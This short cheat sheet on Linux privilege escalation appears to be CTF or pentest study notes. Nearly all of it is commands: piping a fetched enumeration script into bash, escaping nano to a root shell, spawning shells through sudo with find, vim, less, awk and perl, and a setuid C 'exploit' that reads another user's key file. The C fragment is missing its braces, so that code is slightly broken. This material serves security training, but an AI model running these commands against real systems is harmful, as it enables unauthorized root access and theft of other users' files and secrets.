Cheat Sheet :: Privilege Escalation

Using scripts to enum the machine

$> curl | bash
$> curl | bash

Nano privilege escalation

  • This can be used to gain root access on the server.
sudo -u root /bin/nano /opt/priv
  • Nano allows inserting external files into the current one using the shortcut.


  • The command reveals that we can execute system commands using ^X (Press Ctrl + X) and enter the following command to spawn a shell.
Press Ctrl + X
reset; sh 1>&0 2>&0


  • Now we have a root shell. /pics/nano-003.png

Sudo privilege escalation

Listing allowed sudo commands

$> sudo -l

Impersonating with sudo

$> sudo -u victim command

Escalating privileges with find command

$> sudo -u victim /usr/bin/find -exec /bin/bash \;

Escalating privileges with vim editor

$> sudo -u victim /usr/bin/vim

# Inside the vim we can call a shell

Escalating privileges with less command

  • Open a file using less
$> sudo -u victim less /home/victim/key.txt
  • Inside the less we can call a shell

Escalating privileges with awk command

# Reading files with awk
$> sudo -u victim /usr/bin/awk '{print $1}' /home/victim/key.txt

# Executing command within awk
$> sudo -u victim /usr/bin/awk 'BEGIN {system("/bin/bash")}'

Escalating privileges with chmod

  • Create the exploit to call a command

int main(void)
    system("cat /home/victim/key.txt");
  • Compiling the exploit
$> cd /tmp
$> gcc exploit.c -o exploit
  • Setting the setuid and setgid flags
$> sudo -u victim cp exploit exploit2
$> sudo -u victim chmod +xs exploit2
$> ./exploit2

Escalating privileges with perl

$> sudo -u victim perl -e 'exec "/bin/bash";'